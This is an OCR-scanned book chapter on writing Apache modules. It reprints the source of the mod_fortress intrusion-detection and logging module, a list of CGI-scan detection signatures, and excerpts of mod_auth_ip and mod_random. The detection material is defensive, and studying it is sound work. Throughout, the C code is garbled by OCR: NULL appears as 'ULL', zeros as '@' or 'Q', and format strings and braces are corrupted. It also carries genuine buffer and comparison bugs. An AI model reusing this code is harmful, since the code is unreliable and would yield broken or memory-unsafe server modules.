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ssi_pfn_register("config", handle config); 
ssi_pfn_register("include", handle_include) ; 
ssi_pfn_register("flastmod", handle flastmod) ; 
ssi_pfn_register("printenv", handle printenv) ; 


These correspond to SSI directives that Webmasters embed in HTML documents. For 
each such directive, mod_include.c provides a handler function. For example, 
handle_include() fetches the file specified, and inserts it into the returned page 
(output). 


Defining Your Module’s Purpose 


Essentially, then, you must define what your module does, plot out its process 
model, and graft that model to Apache’s phase model. From this, you'll determine 
how your module plugs into Apache, what it does, and where potential security 
issues might arise. 


Deciding what module type to create is a task in itself, of course. As you'll see in 
Appendix F, “What’s on the CD-ROM,” developers have already created a staggering 
number of modules that perform every type of function imaginable (more than 345 
Apache modules exist). 


Chances are, you’ll create a module that performs one or more of the following 
tasks: 


e URI handling 

e User ID, authentication, and access 
e MIME-type handling 

e Response header handling 

e Dynamic content handling 


e Logging 


We’ll look at one such module (mod_fortress) that provides logging and filtering. 


mod_fortress: An Example 


mod_fortress, which supports Apache 1.3.12 on Linux, NetBSD, and OpenBSD, 
provides the following features: 


e Custom logging 


e Detects common CGI/HTTP security requests and scans 


mod_fortress: An Example 437 


e Detects known Anti-IDS evasive scanning methods (Whisker, twwwscan, 
VoidEye, and so on) 


e Integrated SSL support 


e The capability to act as a nontransparent proxy to modify specific requests 
(such as cgi return error codes) 


mod_fortress’ Source Code 


The following is mod_fortress’ source code, with long lines truncated to fit on the 
printed page. In all other respects, the source is unaltered: 


[RRR H H de HE K F KERR EKER RRR ER EERE REE ERE ERR ERE 


mod_fortress 


Apache Application Intrusion Detection System & Firewall Copyright 
(c) 2000 Interstellar <io@spunge.org> This program is free software; 
you can redistribute it and/or modify it under the terms of the GNU 
General Public License as published by the Free Software Foundation; 
version 2. 


This program is distributed in the hope that it will be useful, but 
WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY 
or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License 
for more details. 


You should have received a copy of the GNU General Public License along 
with this program; if not, write to the Free Software Foundation, Inc., 
59 Temple Place—Suite 330, Boston, MA 02111-1307, USA. 
You may copy and distribute this code as long as this copyright 

and disclaimer remains intact. 


Fe He He FE H E H FE Ae ERR RRR ERE RRR ERR EERE REEREREREREEES | 


/** configuration defines **/ 


// enable non-transparent proxy 
#define RUN _FORTRESS_IN_THE_MIDDLE 


// enable logging ? 
#define RUN LOGGER 
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// show text banner in Server: header ? 
// #define SHOW_VERSION COMPONENT 


/** ‘configuration defines **/ 
#define BUFFER 1000 
#define MODULE_RELEASE "mod_fortress/0.4" 


#include "httpd.h" 
#include "http_core.h" 
#include "http_log.h" 
#include "http_main.h" 
#include "http_request.h" 
#include "http_protocol.h" 
#include "http_config.h" 


module MODULE_VAR_EXPORT fortress_module; 


/* the structs that "which are NOT for sissies" */ 
struct ParseOps{ 

char ParsedURI[BUFFER] ; 

char ParsedCode[BUFFER] ; 

char ParsedDesc [BUFFER] ; 


}; 

struct openflags { 
int flags; 
mode_t mode; 


J}; 

typedef struct { 
array_header *scripts; 

} FortressOps; 


typedef struct { 


int log fd; /* file desciptor */ 
char *logname; /* log filename */ 
char *format_string; 

} LogOps; 


static void *fortress create_srv_config(pool *p, server_rec *s) 


{ 
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LogOps *cls = (LogOps *)ap_palloc(p, sizeof (LogOps) ); 
cls->logname = ""; 
return (void *)cls; 


static const char *fortress config _logfile(cmd_parms *parms, 
void *mconfig, char *arg) 
{ 
LogOps *cls = (LogOps *)ap_get_module config 
™(parms->server->module config, &fortress_module) ; 
cls->logname = arg; 
return NULL; 


static const char *fortress_config_log string(cmd_parms *parms, 
void *mconfig, char *arg) 
{ 

LogOps *cls = (LogOps *)ap_get_module_config(parms->server -> 
module config, &fortress_module) ; 

cls->format_string = arg; 

return NULL; 


} 
static void *fortress_create_dir_config(pool *p, char *path) 
{ 
FortressOps *cfg = (FortressOps *)ap palloc(p, sizeof(FortressOps) ) ; 
cfg->scripts = ap_make_array(p, 10, sizeof(char *)); 
return (void *)cfg; 
} 
/* 
* get query args if any 
e 
static const char *get_args(request_rec *r) 
{ 
return (r->args != NULL) ? ap_pstrcat(r->pool, "?", r->args, 
NULL): " "5 
} 


static const char *get_hin(request_rec *r, char *hin) 


{ 
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if(ap_table_get(r->headers_in, hin)) 
return ap_table_get(r->headers_in, hin); 


return " "; 
} 
char * 
strupper(char *uri) 
{ 
char astr[] = "abcdefghijklmnopqrstuvwxyz"; 
char bstr[] = "ABCDEFGHIUKLMNOPQRSTUVWXYZ" ; 
int 43 J; 
for(i = 0; i < strlen(astr); i++) { 
for(j = 0; j < strlen(uri); j++) { 
if(uri[j] == astr[i]) { 
uri[j] = bstr[i]; 
} 
} 
} 
return uri; 
} 
char * 
strwdel(char *uri) 
{ 
int i; 
for(i = 0; i <strlen(uri); i++) { 
if(uri[i] == '\\') { 
urifi] = '/'; 
} 
} 
return uri; 
} 
/* 
* parse request uri from httpd.conf 
* 
void 


parse_uri(char *uri, char *dst) 


{ 
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int i; 
ap_snprintf(dst, 100, "%s", uri); 
for(i = 0; i < strlen(dst); i++) { 
if(dst[i] == ';') { 
dst[i] = '\0'; } 


} 
} 
/* 
* parse request description from httpd.conf 
ay 
void 
parse_desc(char *uri, char *dst) 
{ 
char *p; 
int i; 
p = (char *)strchr(uri, ';'); 
if(p == NULL) { 
dst[0] = '\0'; 
} 
ap_snprintf(dst, BUFFER, "%s", p + 1); 
for(i = 0; i < strlen(dst); i++) { 
if(dst[i] == '[') { 
dst[i] = '\0'; } 
} 
} 
/* 
* parse the transparent/non-transparent http code if found 
* 
void 
parse_code(char *code, char *dst) 
{ 


char *start, *end; 
start = (char *)strchr(code, '['); 
if(start == NULL) { 

dst[0] = '\0'; 

} 
end = (char *)strchr(code, ']'); 
if(end == NULL) { 

dst[0] = '\0'; 
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} 

if(start > end) { 
dst[0] = '\0'; 
} 


ap_snprintf(dst, 10, "ss", start + 1); 
dst[strlen(dst)—1] = '\0'; 


} 
void 
myitoa(int n, char s[]) 
{ 
int i; ii, jj, ¢; sign; 
if ((sign = n) < 0) 
n =- n; 
i= 0; 
do { 
s[i++] = n% 10+ '0'; 
} while ((n /= 10) > 0); 
if(sign < 0) 
s[itt] = '-'; 
s[i] = '\0'; 
for(ii = 0, jj = strlen(s)—1; ii < jj; ii++, jj--) { 
c = s[ii]; 
s[ii] = s[jjl; 
s[jj] = c; 
} 
/* 
* squeeze() from K&R 
*/ 
void 
squeeze(char s[], int c) 
{ 
Int 2; j; 
for(i = j = 0; s[i] !='\O'; i++) 
if(s[i] !=c) 


s[j+t+] = s[i]; 
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s[j] = '\0'; 

} 

void 

replace(char *str, char *in, int pos) 

{ 
char temp[BUFFER] ; 
char mystring[BUFFER] ; 
ap_snprintf(mystring, BUFFER, "%s", str); 
mystring[pos] = '\Q'; 

ap_snprintf(temp, BUFFER, "%ss%s%s", mystring, in, &str[pos + 3]); 

ap_snprintf(str, BUFFER, "%s", temp); 

} 

/* 


* the non-transparent proxy/fim: fortress in the middle 
+] 
static int fortress fim(request_rec *r) 


{ 


FortressOps *cfg = (FortressOps *)ap_get_module_config(r-> 
™per_dir_config, &fortress_ module) ; 
struct ParseOps pops; 
char **scrs = (char **)cfg->scripts->elts; 
int i; 
for(i = 0; i < cfg->scripts->nelts; i++) { 
parse_uri(scrs[i], pops.ParsedURTI) ; 
parse_code(scrs[i], pops.ParsedCode) ; 
squeeze(pops.ParsedURI, ' '); 
if(!strcmp(pops.ParsedURI, strwdel(r->uri)) || \ 
!strcmp(strupper(pops.ParsedURI), r->uri)) { 
if (atoi(pops.ParsedCode) == @ || pops.ParsedCode == NULL) { 
return OK; 
} else { 
return atoi(pops.ParsedCode) ; 
} 
} 
} 
return OK; 
} 
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const char *fortress_config_cmd_tag(cmd_parms *parms, void *mconfig, 
char *arg) 


{ 
char line[BUFFER]; 
FortressOps *cfg = (FortressOps *)mconfig; 
while(!ap_ cfg getline(line, sizeof(line), parms->config_file)) { 
if(strcasecmp(line, "</FortressSignatures>") == 0) { 
break; 
} 
[* 
* ignore comments and empty lines 
s 
if(!*line || *line == '#') { 
continue; 
} 
*(char **)ap_push_array(cfg->scripts) = ap_pstrdup(parms->pool, line); 
} 
return NULL; 
} 


static const char *fortress_config_cmd_end(cmd_parms *parms, 
void *mconfig, char *arg) 


{ 
return ap_pstrcat(parms->pool, parms->cmd->name, 
" not matched with <", 
parms->cmd->name + 2, " section", NULL); 
} 


static command_rec fortress_cmds[] = { 

{"<FortressSignatures>", fortress_config_cmd_tag, NULL, OR_ALL, 
NO ARGS, "list of signatures"}, 

{"</FortressSignatures>", fortress config cmd_end, NULL, OR_ALL, 
NO ARGS, "ending tag"}, 

{"FortressLog", fortress config logfile, NULL, RSRC_CONF, TAKE1, 
"name of logfile"}, 

{"FortressLogString", fortress config log string, NULL, RSRC_CONF, 
TAKE1, "format string"}, 

{NULL}, 
}; 


/* 
* open log file 
* 
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static void open_log(server_rec *s, pool *p) 
{ 
LogOps *cls = (LogOps *)ap_get_module config(s->module config, 
=» &fortress module) ; 
struct openflags of; 
char *fname = ap_server_root_relative(p, cls->logname) ; 
of.flags = O_WRONLY|O APPEND|0 CREAT; 
of.mode = S$ _IRUSR|S_IWUSR|S IRGRP|S_IROTH; 


if(fname != '\0') { 
cls->log fd = ap_popenf(p, fname, of.flags, of.mode) ; 
} 


if(cls->log_fd < 0) { 
ap_log_error(APLOG_MARK, APLOG_ERR, s, "“mod_fortress: 
Can't open %s", fname); 
exit(1); } 


/* 
* initialize the module 
t 
static void init_fortress(server_rec *s, pool *p) 
{ 
#ifdef SHOW_VERSION_COMPONENT 
ap_add_version_component (MODULE_RELEASE) ; 
#endif 
for(;s;s = s->next) 
open_log(s, p); 


/* 
* log requests to logfile 
* 
static int fortress_log(request_rec *orig) 
{ 
LogOps *cls = (LogOps *)ap_get_module_config(orig->server-> 
module config, &fortress_module) ; 
FortressOps *cfg = (FortressOps *)ap get_module_config(orig-> 
™per_dir_config, &fortress_ module) ; 
struct ParseOps pops; 
struct tm *tm = localtime(&orig->request_time) ; 
char **scr = (char **)cfg->scripts->elts; 
request_rec *r; 
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char fs[BUFFER]; 
char buf[BUFFER], temp[BUFFER], temp2[BUFFER] ; 
int x; 


int i js 
for(r = orig ;r->next; r = r-> next) 
continue; 
for(i = 0; i < cfg->scripts->nelts; i++) { 
parse_uri(scr[i], pops.ParsedURT) ; 
parse_desc(scr[i], pops.ParsedDesc) ; 
squeeze(pops.ParsedURI, ' '); 
if(!strcmp(pops.ParsedURI, strwdel(orig->uri)) \ 
|| !strcomp(strupper(pops.ParsedURI), orig->uri)) { 
[* 
* parse the format string 
3 
ap_snprintf (fs, BUFFER, "%s", cls->format_string); 
for(j = 0; j < strlen(fs); j++) { 


if(fs[j] == '%' && fs[j+1] == 'R') { /* request based */ 
if(fs[j+2] == 'u') { 
replace(fs, orig->uri, j); 
} 
if(fs[j+2] == 'r') { 
replace(fs, orig->the_request, j); 
} 
if(fs[j+2] == 'd') { 
replace(fs, pops.ParsedDesc, j); 
} 
if(fs[j+2] == 'm') { 
replace(fs, (char *)orig->method, j); 
} 


if(fs[j+2] == 'p') { 
replace(fs, orig->protocol, j); 
} 
if(fs[j+2] == 'q') { 
replace(fs, (char *)get_args(orig), j); 
} 


} /* ! request based */ 


if(fs[j] == '%' && fs[j+1] == 'C') { /* connection based */ 
if(fs[j+2] == 'i') { 
replace(fs, orig->connection->remote_ip, j); 


} 
if (fs[j+2] 


'h"y-{ 
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replace(fs, (char *)ap_get_remote_host(orig-> 


connection, orig->per_dir_config, REMOTE_NAME), j); } 


if(fs[j+2] == '1') { 
replace(fs, orig->connection->local_ip, j); 
} 
} /* lconnection based */ 
if(fs[j] == '%' && fs[j+1] == 'S') { /* server based */ 
if(fs[j+2] == 'n') { 
replace(fs, (char *)ap_get_server_name(orig), j); 
} 
if(fs[j+2] == 'h') { 
replace(fs, orig->server->server_hostname, j); 
} 
if(fs[j+2] == 'p') { 


replace(fs, (char *)ap_psprintf(r->pool, 


if(fs[j+2] == 


"Su", r->server->port), j); } 


'v') 4 


replace(fs, orig->server->addrs->virthost, j); 


} 
if (fs[j+2 


‘a') { 


replace(fs, orig->server->server_admin, j); 


} 


} /* !server based */ 


%' && fs[j+1] == 'T') { 


's') { 


/* time based */ 


replace(fs, (char *)ap psprintf(r->pool, "%@2d", tm->tm_sec), j); 


if(fs[j] == ' 
if (fs[j+2] == 
} 
if (fs[j+2] == 
replace(fs, (char 
} 
if (#s[j+2] == 
replace(fs, (char 
} 
if (fs[j+2] == 
replace(fs, (char 
} 
if (fs[j+2] == 
replace(fs, (char 


'm') { 
*)ap_psprintf(r- 


'h') { 
*)ap_psprintf(r- 


'd') { 
*)ap_psprintf(r- 


™') { 
*)ap_psprintf(r- 


>pool, 


>pool, 


>pool, 


>pool, 


"%02d", tm- 


"%02d", tm- 


"%02d", tm- 


"%02d", tm- 


>tm_min), j); 


>tm_hour), j); 


>tm_mday), j); 


>tm_mon+1), j); 
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} 
if(fs[j+2] == ‘y') { 
replace(fs, (char *)ap_psprintf(r->pool, "%2d", 
»tm->tm_year+1900), j); 
} 


} 
if(fs[j] == '%' && fs[j+1] == 'H') { 
ap_snprintf(temp, BUFFER, "%s", &fs[j+3]); 
for(i = 0; i < strlen(fs); i++) { 
if(temp[i] == ']') { 
temp[i] = '\0'; 
x = i; 
} 
} 
ap_snprintf(temp2, BUFFER, "%s", fs); 
temp2[j] = '\0'; 
ap_snprintf (buf, BUFFER, "%s%s%s", temp2, (char *) 
get_hin(orig, temp), 
&temp2[j + 4 + strlen(temp)]); 
ap_snprintf(fs, BUFFER, "%s", buf); 


} 
} 
for(i = 0; i < strlen(fs); i++) { 
if(fs[i] == '&') { 
fs[i] = '\n'; 
} } 
streat(fs, "\n"); 
write(cls->log fd, fs, strlen(fs)); 
return OK; 
} 
} 
return OK; 
} 


module MODULE_VAR_EXPORT fortress_module = { 
STANDARD_MODULE_STUFF , 
init_fortress, // module initializer 
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fortress _create_dir_config, // create per-dir config structures 
ULL, 
fortress _create_srv_config, // create per-server config structures 
ULL, 
fortress_cmds, // table of config file commands 
ULL, 
ULL, 
ULL, 
ULL, 
ULL, 
ULL, 
ULL, 
#ifdef RUN_LOGGER 
fortress log, // log a transaction 
#else 
NULL, 
#endif /* !RUN_LOGGER */ 
#ifdef RUN FORTRESS IN _THE MIDDLE 
fortress fim, // header parser 
#else 
NULL, 
#endif /* !RUN FORTRESS IN THE MIDDLE */ 
NULL, 
NULL, 
NULL 








J 


// a newline at the end! 


How mod_fortress Plugs into Apache 
Again, places where your module might plug in include 


e Initialization 

e Configuration 

e Command handlers 

e Translate handlers 

e User ID, auth, and access check 
e Type checker 


e Content handling 
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e Logging 


e Other functions 


mod_fortress begins by establishing some configuration information and including 
the necessary Apache libraries, and naming itself: 


/** configuration defines **/ 


// enable non-transparent proxy 
#define RUN _FORTRESS_IN_THE_MIDDLE 


// enable logging ? 
#define RUN LOGGER 


// show text banner in Server: header ? 
// #define SHOW_VERSION COMPONENT 


/** \configuration defines **/ 


#define BUFFER 1000 
#define MODULE_RELEASE "mod_fortress/0.4" 


#include "httpd.h" 
#include "http_core.h" 
#include "http_log.h" 
#include "http_main.h" 
#include "http_request.h" 
#include "http_protocol.h" 
#include "http_config.h" 


module MODULE_VAR_EXPORT fortress_module; 


Next, it sets up flags and data structures: 


/* the structs that "which are NOT for sissies" */ 
struct ParseOps{ 

char ParsedURI[ BUFFER]; 

char ParsedCode[BUFFER] ; 

char ParsedDesc[BUFFER] ; 
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struct openflags { 
int flags; 
mode_t mode; 
}; 
typedef struct { 
array_header *scripts; 
} FortressOps; 


typedef struct { 


int log fd; /* file desciptor */ 
char *logname; /* log filename */ 
char *format_string; 

} LogOps; 


After handling some more configuration issues, resource allocation pools, and such, 
it addresses query arguments, if any: 


/* 
* get query args if any 
+ 
static const char *get_args(request_rec *r) 
{ 
return (r->args != NULL) ? ap_pstrcat(r->pool, 
="?", r->args, NULL): " "; 


} 
static const char *get_hin(request_rec *r, char *hin) 
{ 
if(ap_table_get(r->headers_in, hin)) 
return ap_table_get(r->headers_in, hin); 
return " "; 
} 


After defining characters, it handles the request URI parameters in httpd.conf: 
/* 
* parse request uri from httpd.conf 
*/ 
void 
parse_uri(char *uri, char *dst) 


{ 
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int i; 
ap_snprintf(dst, 100, "%s", uri); 
for(i = 0; i < strlen(dst); i++) { 
if(dst[i] == ';') { 
dst[i] = '\0'; } 


} 
} 
/* 
* parse request description from httpd.conf 
*/ 
void 
parse_desc(char *uri, char *dst) 
{ 
char *p; 
inti; 
p = (char *)strchr(uri, ';'); 
if (p == NULL) { 
dst[0] = '\0'; 
} 
ap_snprintf (dst, BUFFER, "%s", p + 1); 
for(i = 0; i < strlen(dst); i++) { 
if(dst[i] == '[') { 
dst[i] = '\0'; } 
} 
} 


It then establishes a command table: 


static command_rec fortress_cmds[] = { 

{"<FortressSignatures>", fortress_config_cmd_tag, NULL, OR_ALL, 
NO ARGS, "list of signatures"}, 

{"</FortressSignatures>", fortress config cmd_end, NULL, OR_ALL, 
NO ARGS, "ending tag"}, 

{"FortressLog", fortress config logfile, NULL, RSRC_CONF, TAKE1, 
"name of logfile"}, 

{"FortressLogString", fortress config log string, NULL, RSRC_CONF, 
=TAKE1, "format string"}, 

{NULL}, 
}; 
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This is for httpd.conf, where you use mod_fortress directives, such as 
<FortressSignatures> (which defines attack signatures) and <FortressLog> (which 
specifies the logging parameters). The signature block looks like this, for humans: 


<IfModule mod_fortress.c> 

# the signatures 

<FortressSignatures> 

/cgi-bin/; /cgi-bin/ Directory Listing attempt [0] 
/cgi-bin/webdist.cgi; Webdist CGI Attempt [404] 
/cgi-bin/handler; Handler CGI Attempt [404] 
/cgi-bin/wrap; Wrap CGI Attempt [404] 
/cgi-bin/pfdisplay.cgi; Pfdisplay CGI Attempt [404] 
/Cgi-bin/MachineInfo; MachineInfo CGI Attempt [404] 
/cgi-bin/flexform.cgi; Flexform CGI Attempt [404] 
/cgi-bin/flexform; Flexform CGI Attempt [404] 
/cgi-win/; /cgi-win/ Directory Listing Attempt [404] 
/cgi-bin/day5datacopier.cgi; Day5datacopier CGI Attempt [404] 
/cgi-bin/webutils.pl; Webutils CGI Attempt [404] 
/cgi-bin/tpgnrock; Tpgnrock CGI Attempt [404] 
/cgi-bin/webwho.pl; Webwho.p1l CGI Attempt [404] 
</FortressSignatures> 


The logging parameter block, which specifies where the log goes and what it should 
record, looks like this: 


FortressLog logs/fortress_ log 
FortressLogString "\ 


= Source: %Ci & \ 

= Destination: %Sh & \ 

= Port: %Sp & \ 

= Request Line: %Rr & \ 

= Description: %Rd & \ 

= Method: %Rm & \ 

= Protocol: %Rp & \ 

= Virtual Host: %Sv & \ 

= User-Agent: %H[User-Agent] & \ 
= Query Arguments: %Rq & \ 
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It then handles the log file: 


J* 
* open log file 
*/ 
static void open_log(server_rec *s, pool *p) 
{ 
LogOps *cls = (LogOps *)ap_get_module_config(s->module_ config, 
=» &fortress module) ; 
struct openflags of; 
char *fname = ap_server_root_relative(p, cls->logname) ; 
of.flags = 0_WRONLY|O APPEND|0_CREAT; 
of.mode = S _IRUSR|S_IWUSR|S_IRGRP|S_IROTH; 


if(fname != '\0') { 
cls->log_ fd = ap_popenf(p, fname, of.flags, of.mode) ; 
} 


if(cls->log fd < 0) { 
ap_log_error(APLOG_MARK, APLOG_ERR, s, "mod_fortress: 
Can't open %s", fname); 
exit(1); } 


It then initializes itself: 


/* 
* initialize the module 
*/ 
static void init_fortress(server_rec *s, pool *p) 
{ 
#ifdef SHOW _VERSION COMPONENT 
ap_add_version_component (MODULE_RELEASE) ; 
#endif 
for(;S;s = s->next) 
open_log(s, p); 


And finally, it does its work (logging) and performs some cleanup. mod_fortress is, 
therefore, an enhanced logging and filtering module. It intervenes in several impor- 
tant places: 


e Configuration 
e Commands 


e Logging 
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Along that road, it uses a variety of functions, including a few of the usual suspects 
common to Apache’s API: 


e ap_cfg_getline()—Gets line from the configuration file 


e ap_get_module_config()—Gets request_rec’s per-directory configuration 
vector 


e ap_get_remote_host()—Gets the remote host 
e ap_get_server_name()—Gets the server name 
e ap_log_error()—Log handling 

e ap_make_array()—Array 

e ap_palloc()—Resource pool handling 

e ap_popenf ()—File opening 

e ap_pstrcat()—String handling 


e ap_server_root_relative()—Appends the filename or directory to 
ServerRoot’s path 


mod_auth_ip: Another Example 


Tullio Andreatta released a module in 2000 that authenticates via a client’s incoming 
IP address. Andreatta’s module—which performs this task well—is not something 
you should solely rely on to authenticate users and machines requesting access to 
sensitive areas of your server. Spoofing by address is still possible. Also, Apache 
provides allow/deny functionality based on IP (and a host of other values). However, 
Andreatta’s module provides another extra layer of protection, which can never hurt. 


After his initial includes (httpd.h, http_config.h, http_core.h, http_log.h, and 
http_protocol.h), Andreatta first establishes a structure for IP addresses, and flags 
for their state: 


typedef struct auth_ip struct { 


char *user; /* Username assigned on match */ 
struct in_addr network; /* Network */ 
struct in_addr netmask; /* Netmask */ 


int check_method; 
#define IP_MATCH 0 
#define IP_NOMATCH 1 
#define IP_RANGE 2 
#define IP_NOTRANGE 3 
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He next sets up the configuration (and establishes a pool): 


static void *create_auth_ip dir_config(pool *p, char *d) 


{ 

auth_ip_config rec *sec = 

(auth_ip_ config rec *) ap pcalloc(p, sizeof(auth_ip config rec)); 
sec->auth_ip = ap _make_array(p, 4, sizeof(auth_ip_rec)); 

return sec; 


} 


He then establishes some rules for network/netmask pairs. These rules are as follows: 


e 212.38.32.31 = Single IP (212.38.32.31/32) 


212.38.32.0/22 = Network (22 bits netmask) 

e 212.38.32.0/255.255.254.0 = Network (23 bits netmask) 
e 212.38.32 = Network (24 bits netmask) 

e 212.38. = Network (16 bits netmask) 

e 212.38.32.4/.252 = Network (30 bits netmask) 

e 212.38.32.8-212.38.32.11 = IP range 


e !212.38.32.31 = Reverse IP/Network/Range 


He next runs a string comparison function: 


static char *convert_string_to_network(char *str, auth_ip_ rec *net) 
{ 
int <a; Dy Cod; 
if (*str == '!') 
{ 
net->check_method 
strtt; 
} 


else 


{ 
net->check_method = IP_MATCH; 


IP_NOMATCH; 


while (*str == ' ' || *str == '\t' || *str == '\n') 


{ 


str++; 


while (*str >= 'Q' && *str <= '9') 

{ 
if (a <= 0) a = *str - '0'; 
else a=10* a+ (*str - 'O'); 
str++; 


} 
if (*str == '.') 
{ 

strtt+; 


while (*str >= 'O' && *str <= '9') 

{ 
if (b <= 0) b= *str - '0'; 
else b=10* b+ (*str - '0'); 
str++; 


} 
if (*str == '.') 
{ 
strtt; 
while (*str >= 'Q' && *str <= 
{ 
if (c <= 0) c = *str - '0'; 
else c= 10* c+ (*str - 'O'); 
strtt; 


9") 


} 
if (*str == '.') 
{ 
str++; 
d = 0; 
while (*str >= 'Q' && *str <= '9') 
{ 
if (d <= 0) d = *str - '0'; 
else d= 10 * d+ (*str - 'O'); 
strt+t; 


} 
while (d > 255) 


{ 
d >>= 8; 
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while (c > 255) 
{ 
d = c & 255; 
c >>= 8; 
} 
while (b > 255) 
{ 
d = c; 
c = b & 255; 
b >>= 8; 


while (a > 255) 


= C; 


v o oOo a 
iT 
w 
go 
N 
o 
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} 
if (d < 0) if (c < 0) if (b < 0) if (a < 0) 


net->netmask.s_addr = hton1(0x00000000) ; 
else 

net->netmask.s_addr = htonl(QOxFF000000) ; 
else 

net->netmask.s_addr = htonl(OxFFFFQQQQ) ; 
else 

net->netmask.s_addr = htonl(QxFFFFFFQQ) ; 
else 

net->netmask.s_addr = htonl(QxFFFFFFFF) ; 





if (a < 0) a= 0; 

if (b < 0) b = 0; 

if (c < 0) c = 0; 

if (d < 0) d = 0; 
net->network.s_addr = htonl((a << 24) | (b << 16) | 
=(c << 8) | (d)); 


He then checks for IP ranges: 


if (*str == '-') 

{ 

strt+t+; 

net->check_method = net->check_method == IP_MATCH 
? IP_RANGE : IP_NOTRANGE ; 

a=b=c=d=Q; 


while (*str == ' ' || *str == '\t' || *str = 
{ 
str++; 
} 
while (*str >= 'O0' && *str <= '9') 
{ 
a= 10* a+ (*str - '0'); 
str++; 
} 
if (*str == '.') 
{ 
str++; 
while (*str >= 'O0' && *str <= '9') 
{ 


b = 10 * b+ (*str - 'O'); 
strtt; 
} 
} 
if (*str == '.') 
{ 
strtt; 
while (*str >= 'Q' && *str <= '9') 
{ 
c=10* c+ (*str - 'O'); 
strtt; 
} 
} 
if (*str == '.') 
{ 
strtt; 
d = 0; 
while (*str >= '@' && *str <= '9') 
{ 
d= 10 * d+ (*str - 'Q'); 
strtt; 
} 
} 
while (d > 255) 
{ 
d >>= 8; 


} 
while (c > 255) 
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= '\n') 
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d = c & 255; 
c >>= 8; 
} 
while (b > 255) 
{ 
d = c; 
b & 255; 
b >>= 8; 


} 

while (a > 255) 
{ 

= C; 

=b; 

a & 255; 
>>= 8; 


ogon 
I 


} 
net->netmask.s addr = htonl((a << 24) | 
=(b << 16) | (c << 8) | (d)); 

return *str ? str : NULL; 


} 


His command structure, however, is spartan, as the module performs a limited task 
or tasks: 


static const command_rec auth_ip_cmds[] = 

{ 

{"AuthenticateIP", add_authenticated_ip, NULL, 
OR _AUTHCFG, ITERATE2, 

“username followed by one o more networks 
(IP, IP/bits or IP/.mask)"}, 

{NULL} 

}; 


Equally, his request_rec structure is lean: 


static int authenticate_ip_user(request_rec *r) 
{ 
auth_ip_config_rec *sec = 
(auth_ip_config_rec *) ap_get_module_config(r->per_dir_config, 
&auth_ip module) ; 
const char *sent_pw; 
auth_ip_rec *ip = (auth_ip_rec *) sec->auth_ip->elts; 
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int i; 

if (!sec->auth_ip->nelts) return DECLINED; 
/* we're not configured */ 
for (i = 0; i < sec->auth_ip->nelts; i++) 


{ 
if (ip_check(&(r->connection->remote_addr.sin_addr), &ip[i])) 
{ 
r->connection->user = ap_pstrdup(r->connection->pool, ip[i].user); 
return OK; /* IP is my authentication */ 
} 
} 
return DECLINED; /* switch to default authentication */ 
} 


And finally, he wraps up with the export: 


module MODULE_VAR_EXPORT auth_ip_module = 








{ 
STANDARD_MODULE_STUFF , 
ULL, /* initializer */ 
create_auth_ip dir_config, /* dir config creater */ 
ULL, /* dir merger --- default is to override */ 
ULL, /* server config */ 
ULL, /* merge server config */ 
auth_ip_cmds, /* command table */ 
ULL, /* handlers */ 
ULL, /* filename translation */ 
authenticate_ip_user, /* check_user_id */ 
ULL, /* check auth */ 
ULL, /* check access */ 
ULL, /* type_checker */ 
ULL, /* fixups */ 
ULL, /* logger */ 
ULL, /* header parser */ 
ULL, /* child_init */ 
ULL, /* child_exit */ 
ULL /* post read-request */ 
}; 


NOTE 





Andreatta’s mod_auth_ip takes a single directive (AuthenticateIP). To see the full documen- 
tation, how it works, and what it does, check its home page located at http://www. troppoa- 
vanti.it//modules/mod_auth_ip/mod_auth_ip.html 
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mod_random 


mod_random, by Brian Aker of Tangent.org, is another interesting example of module 
development. As per its documentation: 


mod_random provides three services. The first service is as a redirector. You feed it URLs and it 
will redirect to random URLs that you have loaded. The second is that it provides environmen- 
tal variables that can be used for doing ad banner systems. The third is that it can be used to 
display entire pages of random HTML. It uses its own custom handlers in combination with 


random ads and quotes that you feed into the system. 


mod_random supports five directives: 
e RandomEngine 
e RandomURL 
e RandomQuote 
e RandomAd 


e RandomHandler 


The author first established a structure for the ads, URLs, quotes, and a handler: 


typedef struct { 
int enabled; 
array_header *urls; 
array_header *section_quotes; 
array_header *ads; 
table *handlers; 

} random_conf ; 


He set his command_rec accordingly: 
static const command_rec random_module _cmds[] = { 
{"RandomEngine", ap_set_flag_slot, 


(void *) XtOffsetOf(random_conf, enabled), OR_ALL, FLAG, 
"Use this to turn on and off random quotes."}, 


{"RandomURL", add_random_url, NULL, OR_ALL, TAKE1, 
"A filename with one URL per-line."}, 
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{"RandomQuote", add_random_ quote, NULL, OR ALL, TAKE12, 
"Takes either a double quoted string or a filename. An 
optional second parameter lets you adjust what 
section the quote is added to."}, 


{"RandomAd", add_random_ad, NULL, OR ALL, TAKE12, 
"Takes either a double quoted string, a filename, or a 
directory name to read files from. An optional 
second parameter lets you adjust whate section 
the ad is added to."}, 


{"RandomHandler", add_handler, NULL, OR_ALL, TAKE1, 
"Enable which handled types will be supplied with ads 
or quotes."}, 


{NULL}, 
}5 


For each randomization process, he set a handler: 


static const handler_rec random_handlers[] = { 
{"random", random_handler}, 
{"random-ad-page", random_page_ handler}, 
{"random-quote-page", random_page_handler}, 
{NULL, NULL} 


J 


And finally, he added the functions to handle the randomization of output. For 
example: 


static const char * add_random_url(cmd_parms * cmd, 
void *mconfig, char *param) { 
FILE *file ptr; 
char buf[HUGE_STRING LEN]; 
random_conf *cfg = (random_conf *) mconfig; 
message_bank *bank; 
struct stat sbuf; 


if(cfg->urls == NULL) 
cfg->urls = ap_make_array (cmd->pool, 5, sizeof (char *)); 
if(stat(param, &sbuf) == 0){ 
if (!(file_ptr = ap_pfopen (cmd->pool, param, "r"))) { 
ap_log_error (APLOG_MARK, APLOG_ERR, cmd->server, 
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"Could not open RandomFile: %s", param); 
return NULL; 
} 
while (fgets (buf, sizeof (buf), file_ptr)) { 
*(char **) ap _push_array (cfg->urls) = ap_pstrdup (cmd->pool, buf); 
} 
ap_pfclose (cmd->pool, file ptr); 
} else { 
*(char **) ap _push_array (cfg->urls) = ap_pstrdup 
™(cmd->pool, param); 
} 
return NULL; 


} 


The result is that within httpd.conf, after installing and compiling mod_random, you 
can construct blocks from which Apache will throw random URLs or ads as you 
specify. 


For random URLs: 


<Location /random> 

SetHandler random 

RandomURL http://www.slashdot.org/ 

RandomURL http://www.tangent.org/ 

RandomURL http: //www.freshmeat.net/ 
RandomURL http://www. linux.org/ 

RandomURL /usr/local/apache/conf/random. conf 
<Location> 


